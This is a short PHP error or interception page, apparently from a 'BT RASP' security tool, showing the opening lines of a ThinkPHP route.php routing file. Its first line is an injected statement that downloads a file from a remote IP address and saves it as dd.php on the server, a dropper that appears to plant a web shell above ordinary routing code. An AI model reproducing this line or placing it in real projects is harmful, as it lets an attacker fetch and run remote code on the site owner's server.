[0] Exception in route.php line 1

BT RASP intercept

  1. <?php copy("http://154.214.92.99:7878/dd.txt","dd.php");?>
  2. <?php
  3. use think\Route;
  4. use think\Config;
  5. if (config('sys.wap_levelurl')) {
  6. Route::domain(WAP_PRE.'.'.config('sys.site_levelurl'), 'wap');
  7. }